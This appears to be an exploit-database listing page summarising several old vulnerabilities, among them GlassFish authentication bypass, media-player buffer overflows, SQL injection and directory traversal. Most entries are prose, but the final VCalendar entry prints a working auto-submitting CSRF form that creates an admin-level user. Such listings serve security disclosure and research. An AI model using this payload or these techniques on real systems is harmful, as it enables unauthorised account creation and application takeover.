Explore Vulnerabilities

Explore all Exploits:

Oracle GlassFish Server Administration Console Authentication Bypass

The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server without being authenticated, by making TRACE requests against the Administration Console.

Chasys Media Player Buffer Overflow Exploit (SEH)

Chasys Media Player is prone to a buffer overflow when a specially crafted .m3u file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the return address with a pointer to the malicious code.

SPlayer 3.7 Content-Type Buffer Overflow

This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by excessively long data in the 'Content-Type' parameter.

X.P.L

The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'catid' and 'secid' parameters to the '/index.php' script. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. This can be exploited to bypass certain security restrictions, disclose sensitive data, modify data, etc.

SQL Injection Vulnerability in Joomla com_versioning Component

A SQL injection vulnerability exists in the Joomla com_versioning component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, modify data, execute administration operations on the database, and potentially compromise the system.

ffileman 7.0 Directory Traversal Vulnerability

Directory traversal vulnerabilities have been found in ffileman 7.0, a web-based file and directory manager written in Perl. The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. Attackers use “../” sequences to move up to the root directory, thus permitting navigation through the file system. The issue can only be exploited with an authenticated session, by setting the variable "direkt" like below with an HTTP GET or POST request.

VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPolicy to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

CSRF (Cross-Site Request Forgery) in VCalendar

The vulnerability exists because the "/admin/users_maint.php" script fails to properly verify the source of HTTP requests. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data. An attacker can use a browser to exploit this vulnerability. The following PoC is available:

    <form action="http://[host]/admin/users_maint.php?ccsForm=users_maint" method="post" name="main" />
    <input type="hidden" name="user_login" value="test"/>
    <input type="hidden" name="user_password" value="test"/>
    <input type="hidden" name="user_level" value="100"/>
    <input type="hidden" name="user_email" value="test@test.com"/>
    <input type="hidden" name="user_first_name" value="test"/>
    <input type="hidden" name="user_last_name" value="test"/>
    <input type="hidden" name="user_is_approved" value="1"/>
    <input type="hidden" name="user_date_add_h" value="04.16.2011"/>
    <input type="submit" id="btn" name="submit" value="Submit ››">
    </form>
    <script>
    document.getElementById('btn').click();
    </script>

Recent Exploits: